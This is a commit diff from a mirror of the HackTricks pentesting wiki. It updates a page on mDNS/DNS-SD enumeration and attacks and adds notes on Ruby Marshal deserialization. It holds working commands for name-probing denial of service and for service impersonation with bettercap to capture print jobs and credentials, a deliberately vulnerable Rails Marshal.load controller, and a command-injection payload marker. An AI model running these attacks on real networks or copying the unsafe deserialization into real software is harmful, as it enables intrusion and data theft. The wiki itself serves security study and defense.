maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

Browse Source
This commit is contained in:
carlospolop 2025-08-20 16:02:04 +02:00
commit d98e388b63
2 changed files with 175 additions and 37 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

153
src/network-services-pentesting/5353-udp-multicast-dns-mdns.md
View File

@ -2,60 +2,146 @@
{{#include ../banners/hacktricks-training.md}}
## **Basic Information**
## Basic Information
**Multicast DNS (mDNS)** enables **DNS-like operations** within local networks without needing a traditional DNS server. It operates on **UDP port 5353** and allows devices to discover each other and their services, commonly seen in various IoT devices. **DNS Service Discovery (DNS-SD)**, often used alongside mDNS, aids in identifying services available on the network through standard DNS queries.
Multicast DNS (mDNS) enables DNS-like name resolution and service discovery inside a local link without a unicast DNS server. It uses UDP/5353 and the multicast addresses 224.0.0.251 (IPv4) and FF02::FB (IPv6). DNS Service Discovery (DNS-SD, typically used with mDNS) provides a standardized way to enumerate and describe services via PTR, SRV and TXT records.
```
PORT STATE SERVICE
5353/udp open zeroconf
```
### **Operation of mDNS**
Key protocol details youll often leverage during attacks:
- Names in the .local zone are resolved via mDNS.
- QU (Query Unicast) bit may request unicast replies even for multicast questions.
- Implementations should ignore packets not sourced from the local link; some stacks still accept them.
- Probing/announcing enforces unique host/service names; interfering here creates DoS/“name squatting” conditions.
In environments without a standard DNS server, mDNS allows devices to resolve domain names ending in **.local** by querying the multicast address **224.0.0.251** (IPv4) or **FF02::FB** (IPv6). Important aspects of mDNS include a **Time-to-Live (TTL)** value indicating record validity and a **QU bit** distinguishing between unicast and multicast queries. Security-wise, it's crucial for mDNS implementations to verify that the packet's source address aligns with the local subnet.
## DNS-SD service model
### **Functioning of DNS-SD**
Services are identified as _<service>._tcp or _<service>._udp under .local, e.g. _ipp._tcp.local (printers), _airplay._tcp.local (AirPlay), _adb._tcp.local (Android Debug Bridge), etc. Discover types with _services._dns-sd._udp.local, then resolve discovered instances to SRV/TXT/A/AAAA.
DNS-SD facilitates the discovery of network services by querying for pointer records (PTR) that map service types to their instances. Services are identified using a **\_\<Service>.\_tcp or \_\<Service>.\_udp** pattern within the **.local** domain, leading to the discovery of corresponding **SRV** and **TXT records** which provide detailed service information.
## Network Exploration and Enumeration
### **Network Exploration**
- nmap target scan (direct mDNS on a host):
```bash
nmap -sU -p 5353 --script=dns-service-discovery <target>
```
- nmap broadcast discovery (listen to the segment and enumerate all DNS-SD types/instances):
```bash
sudo nmap --script=broadcast-dns-service-discovery
```
- avahi-browse (Linux):
```bash
# List service types
avahi-browse -bt _services._dns-sd._udp
# Browse all services and resolve to host/port
avahi-browse -art
```
- Apple dns-sd (macOS):
```bash
# Browse all HTTP services
dns-sd -B _http._tcp
# Enumerate service types
dns-sd -B _services._dns-sd._udp
# Resolve a specific instance to SRV/TXT
dns-sd -L "My Printer" _ipp._tcp local
```
- Packet capture with tshark:
```bash
# Live capture
sudo tshark -i <iface> -f "udp port 5353" -Y mdns
# Only DNS-SD service list queries
sudo tshark -i <iface> -f "udp port 5353" -Y "dns.qry.name == \"_services._dns-sd._udp.local\""
```
#### **nmap Usage**
A useful command for scanning the local network for mDNS services is:
```bash
nmap -Pn -sUC -p5353 [target IP address]
```
This command helps identify open mDNS ports and the services advertised over them.
#### **Network Enumeration with Pholus**
To actively send mDNS requests and capture traffic, the **Pholus** tool can be utilized as follows:
```bash
sudo python3 pholus3.py [network interface] -rq -stimeout 10
```
Tip: Some browsers/WebRTC use ephemeral mDNS hostnames to mask local IPs. If you see random-UUID.local candidates on the wire, resolve them with mDNS to pivot to local IPs.
## Attacks
### **Exploiting mDNS Probing**
### mDNS name probing interference (DoS / name squatting)
An attack vector involves sending spoofed responses to mDNS probes, suggesting that all potential names are already in use, thus hindering new devices from selecting a unique name. This can be executed using:
During the probing phase, a host checks name uniqueness. Responding with spoofed conflicts forces it to pick new names or fail. This can delay or prevent service registration and discovery.
Example with Pholus:
```bash
sudo python pholus.py [network interface] -afre -stimeout 1000
# Block new devices from taking names by auto-faking responses
sudo python3 pholus3.py <iface> -afre -stimeout 1000
```
This technique effectively blocks new devices from registering their services on the network.
### Service spoofing and impersonation (MitM)
**In summary**, understanding the workings of mDNS and DNS-SD is crucial for network management and security. Tools like **nmap** and **Pholus** offer valuable insights into local network services, while awareness of potential vulnerabilities helps in safeguarding against attacks.
Impersonate advertised DNS-SD services (printers, AirPlay, HTTP, file shares) to coerce clients into connecting to you. This is especially useful to:
- Capture documents by spoofing _ipp._tcp or _printer._tcp.
- Lure clients to HTTP/HTTPS services to harvest tokens/cookies or deliver payloads.
- Combine with NTLM relay techniques when Windows clients negotiate auth to spoofed services.
### Spoofing/MitM
With bettercaps zerogod module (mDNS/DNS-SD spoofer/impersonator):
```bash
# Start mDNS/DNS-SD discovery
sudo bettercap -iface <iface> -eval "zerogod.discovery on"
The most interesting attack you can perform over this service is to perform a **MitM** in the **communication between the client and the real server**. You might be able to obtain sensitive files (MitM the communication with the printer) of even credentials (Windows authentication).\
# Show all services seen from a host
> zerogod.show 192.168.1.42
# Impersonate all services of a target host automatically
> zerogod.impersonate 192.168.1.42
# Save IPP print jobs to disk while impersonating a printer
> set zerogod.ipp.save_path ~/.bettercap/zerogod/documents/
> zerogod.impersonate 192.168.1.42
# Replay previously captured services
> zerogod.save 192.168.1.42 target.yml
> zerogod.advertise target.yml
```
Also see generic LLMNR/NBNS/mDNS/WPAD spoofing and credential capture/relay workflows:
{{#ref}}
../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
{{#endref}}
### Notes on recent implementation issues (useful for DoS/persistence during engagements)
- Avahi reachable-assertion and D-Bus crash bugs (2023) can terminate avahi-daemon on Linux distributions (e.g. CVE-2023-38469..38473, CVE-2023-1981), disrupting service discovery on target hosts until restart.
- Cisco IOS XE Wireless LAN Controller mDNS gateway DoS (2024, CVE-2024-20303) allows adjacent attackers to drive high CPU and disconnect APs. If you encounter an mDNS gateway between VLANs, be aware of its stability under malformed or high-rate mDNS.
## Defensive considerations and OPSEC
- Segment boundaries: Dont route 224.0.0.251/FF02::FB between security zones unless an mDNS gateway is explicitly required. If you must bridge discovery, prefer allowlists and rate limits.
- Windows endpoints/servers:
- To hard-disable name resolution via mDNS set the registry value and reboot:
```
HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS = 0 (DWORD)
```
- In managed environments, disable the built-in “mDNS (UDP-In)” Windows Defender Firewall rule (at least on the Domain profile) to prevent inbound mDNS processing while preserving home/roaming functionality.
- On newer Windows 11 builds/GPO templates, use the policy “Computer Configuration > Administrative Templates > Network > DNS Client > Configure multicast DNS (mDNS) protocol” and set it to Disabled.
- Linux (Avahi):
- Lock down publishing when not needed: set `disable-publishing=yes`, and restrict interfaces with `allow-interfaces=` / `deny-interfaces=` in `/etc/avahi/avahi-daemon.conf`.
- Consider `check-response-ttl=yes` and avoid `enable-reflector=yes` unless strictly required; prefer `reflect-filters=` allowlists when reflecting.
- macOS: Restrict inbound mDNS at host/network firewalls when Bonjour discovery is not needed for specific subnets.
- Monitoring: Alert on unusual surges in `_services._dns-sd._udp.local` queries or sudden changes in SRV/TXT of critical services; these are indicators of spoofing or service impersonation.
## Tooling quick reference
- nmap NSE: `dns-service-discovery` and `broadcast-dns-service-discovery`.
- Pholus: active scan, reverse mDNS sweeps, DoS and spoofing helpers.
```bash
# Passive sniff (timeout seconds)
sudo python3 pholus3.py <iface> -stimeout 60
# Enumerate service types
sudo python3 pholus3.py <iface> -sscan
# Send generic mDNS requests
sudo python3 pholus3.py <iface> --request
# Reverse mDNS sweep of a subnet
sudo python3 pholus3.py <iface> -rdns_scanning 192.168.2.0/24
```
- bettercap zerogod: discover, save, advertise, and impersonate mDNS/DNS-SD services (see examples above).
## Spoofing/MitM
The most interesting attack you can perform over this service is to perform a MitM in the communication between the client and the real server. You might be able to obtain sensitive files (MitM the communication with the printer) or even credentials (Windows authentication).\
For more information check:
{{#ref}}
@ -65,8 +151,7 @@ For more information check:
## References
- [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://books.google.co.uk/books/about/Practical_IoT_Hacking.html?id=GbYEEAAAQBAJ&redir_esc=y)
- [Nmap NSE: broadcast-dns-service-discovery](https://nmap.org/nsedoc/scripts/broadcast-dns-service-discovery.html)
- [bettercap zerogod (mDNS/DNS-SD discovery, spoofing, impersonation)](https://www.bettercap.org/modules/ethernet/zerogod/)
{{#include ../banners/hacktricks-training.md}}

59
src/pentesting-web/deserialization/README.md
View File

@ -1082,7 +1082,60 @@ This payload is compiled into binary Ruby code and concatenated with a carefully
Using the arbitrary file write vulnerability, the attacker writes the crafted cache file to the computed location. Next, they trigger a server restart (by writing to tmp/restart.txt, which is monitored by Puma). During restart, when Rails requires the targeted file, the malicious cache file is loaded, resulting in remote code execution (RCE).
### Ruby Marshal exploitation in practice (updated)
Treat any path where untrusted bytes reach `Marshal.load`/`marshal_load` as an RCE sink. Marshal reconstructs arbitrary object graphs and triggers library/gem callbacks during materialization.
- Minimal vulnerable Rails code path:
```ruby
class UserRestoreController < ApplicationController
def show
user_data = params[:data]
if user_data.present?
deserialized_user = Marshal.load(Base64.decode64(user_data))
render plain: "OK: #{deserialized_user.inspect}"
else
render plain: "No data", status: :bad_request
end
end
end
```
- Common gadget classes seen in real chains: `Gem::SpecFetcher`, `Gem::Version`, `Gem::RequestSet::Lockfile`, `Gem::Resolver::GitSpecification`, `Gem::Source::Git`.
- Typical side-effect marker embedded in payloads (executed during unmarshal):
```
*-TmTT="$(id>/tmp/marshal-poc)"any.zip
```
Where it surfaces in real apps:
- Rails cache stores and session stores historically using Marshal
- Background job backends and file-backed object stores
- Any custom persistence or transport of binary object blobs
Industrialized gadget discovery:
- Grep for constructors, `hash`, `_load`, `init_with`, or side-effectful methods invoked during unmarshal
- Use CodeQLs Ruby unsafe deserialization queries to trace sources → sinks and surface gadgets
- Validate with public multi-format PoCs (JSON/XML/YAML/Marshal)
## References
- Trail of Bits Marshal madness: A brief history of Ruby deserialization exploits: https://blog.trailofbits.com/2025/08/20/marshal-madness-a-brief-history-of-ruby-deserialization-exploits/
- elttam Ruby 2.x Universal RCE Deserialization Gadget Chain: https://www.elttam.com/blog/ruby-deserialization/
- Phrack #69 Rails 3/4 Marshal chain: https://phrack.org/issues/69/12.html
- CVE-2019-5420 (Rails 5.2 insecure deserialization): https://nvd.nist.gov/vuln/detail/CVE-2019-5420
- ZDI RCE via Ruby on Rails Active Storage insecure deserialization: https://www.zerodayinitiative.com/blog/2019/6/20/remote-code-execution-via-ruby-on-rails-active-storage-insecure-deserialization
- Include Security Discovering gadget chains in Rubyland: https://blog.includesecurity.com/2024/03/discovering-deserialization-gadget-chains-in-rubyland/
- GitHub Security Lab Ruby unsafe deserialization (query help): https://codeql.github.com/codeql-query-help/ruby/rb-unsafe-deserialization/
- GitHub Security Lab PoCs repo: https://github.com/GitHubSecurityLab/ruby-unsafe-deserialization
- Doyensec PR Ruby 3.4 gadget: https://github.com/GitHubSecurityLab/ruby-unsafe-deserialization/pull/1
- Luke Jahnke Ruby 3.4 universal chain: https://nastystereo.com/security/ruby-3.4-deserialization.html
- Luke Jahnke Gem::SafeMarshal escape: https://nastystereo.com/security/ruby-safe-marshal-escape.html
- Ruby 3.4.0-rc1 release: https://github.com/ruby/ruby/releases/tag/v3_4_0_rc1
- Ruby fix PR #12444: https://github.com/ruby/ruby/pull/12444
- Trail of Bits Auditing RubyGems.org (Marshal findings): https://blog.trailofbits.com/2024/12/11/auditing-the-ruby-ecosystems-central-package-repository/
{{#include ../../banners/hacktricks-training.md}}